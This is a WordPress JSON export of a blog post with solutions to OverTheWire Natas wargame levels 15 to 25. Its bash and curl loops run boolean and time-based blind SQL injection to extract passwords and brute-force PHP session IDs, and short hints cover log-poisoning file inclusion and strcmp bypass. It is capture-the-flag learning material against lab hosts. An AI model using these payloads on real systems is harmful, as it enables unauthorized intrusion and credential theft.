{"id":977,"date":"2018-04-13T13:42:46","date_gmt":"2018-04-13T17:42:46","guid":{"rendered":"https:\/\/www.joshho.com\/blog\/?p=977"},"modified":"2018-04-13T13:55:05","modified_gmt":"2018-04-13T17:55:05","slug":"collection-of-natas","status":"publish","type":"post","link":"https:\/\/www.joshho.com\/blog\/2018\/04\/13\/collection-of-natas\/","title":{"rendered":"Collection of Natas"},"content":{"rendered":"<p><strong>Natas 15 <\/strong><br \/>\nAttempt until the password substring matches<br \/>\n<code><\/p>\n<pre lang='bash'>k=''\r\nfor v in {{a..z},{A..Z},{0..9}}; \r\n  do\r\n    curl \"natas15:$pw@\"'http:\/\/natas15.natas.labs.overthewire.org\/index.php'\r\n     --data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'$k$v'%25'\r\n     --compressed > out 2>\/dev\/null; \r\n    if [ `grep -c 'user exists' out` -gt 0 ]; \r\n      then k=$k$v; echo $k; break; \r\n    fi; \r\ndone<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 18 <\/strong><br \/>\nCapture Password by introducing a 10 second sleep if the password is correct<br \/>\n<code><\/p>\n<pre lang='bash'>#timeout.sh contains:\r\nperl -e 'alarm shift; exec @ARGV' \"$@\";<\/pre>\n<p><\/code><br \/>\nTest the duration of the curl command<br \/>\n<code><\/p>\n<pre lang='bash'>for z in {0..33}; \r\n  do \r\n    w=0; \r\n    for v in {{a..z},{A..Z},{0..9}}; \r\n      do .\/timeout.sh 2 bash -c \"curl natas18:$pw@'http:\/\/natas17.natas.labs.overthewire.org\/index.php' \r\n        --data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22'$pw$v'%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23' \r\n        --compressed > out 2>\/dev\/null\" 2>\/dev\/null; \r\n        if [ $? 
-ne 0 ]; \r\n          then pw=$pw$v; \r\n          echo $pw; \r\n          w=1; \r\n        fi; \r\n    done; \r\n    if [ $w -eq 0 ]; then break; fi; \r\ndone;<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 19<\/strong><br \/>\nSearch for session ID with a different page output<br \/>\n<code><\/p>\n<pre lang='bash'>for k in {0..640};\r\n  do\r\n    curl \"natas19:$pw@\"'http:\/\/natas18.natas.labs.overthewire.org\/index.php' -H 'Cookie: PHPSESSID='$k\r\n     --compressed > out 2>\/dev\/null; \r\n     if [ `grep regular out | wc -l` -eq 0 ]; \r\n       then echo $k; \r\n       break; \r\n     fi; \r\ndone<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 20 <\/strong><br \/>\nBrute Force for session ID after capturing ~500 new sessions (where username=admin) to determine common cookie elements, starts with 3, ends with 2d61646d696e.<br \/>\n<code><\/p>\n<pre lang='bash'>for k in {0..64000}; \r\n  do\r\n    curl \"natas20:$pw@\"'http:\/\/natas19.natas.labs.overthewire.org\/index.php?debug=1'\r\n      -H 'Cookie: PHPSESSID=3'$k'2d61646d696e' --compressed > out 2>\/dev\/null; \r\n    if [ `grep -E 'regular|username' out | wc -l ` -eq 0 ]; \r\n      then echo 'found: '$k; \r\n      break; \r\n    fi; \r\n    if [ $((k % 100)) -eq 0 ]; \r\n      then echo $k; \r\n    fi; \r\ndone;<\/pre>\n<p><\/code><\/p>\n<p><strong>Other Hints<\/strong><\/p>\n<p><strong>21<\/strong> &#8211; Add %0A to trick the sessionwrite<br \/>\n<strong>22<\/strong> &#8211; Simply change the form to send admin=1, then use the sessionID in the other site<br \/>\n<strong>23<\/strong> &#8211; Ignore the redirect (and get the full webpage via curl)<br \/>\n<strong>24<\/strong> &#8211; Break strcmp (make it fail)<br \/>\n<strong>25<\/strong> &#8211; Log our php code into the *.log, then have the index.php &#8216;include&#8217; the php commands we embedded in the log file.<\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[82],"tags":[86,89,83,53],"_links":{"self":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/posts\/977"}],"collection":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/comments?post=977"}],"version-history":[{"count":0,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/posts\/977\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/media?parent=977"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/categories?post=977"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/tags?post=977"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}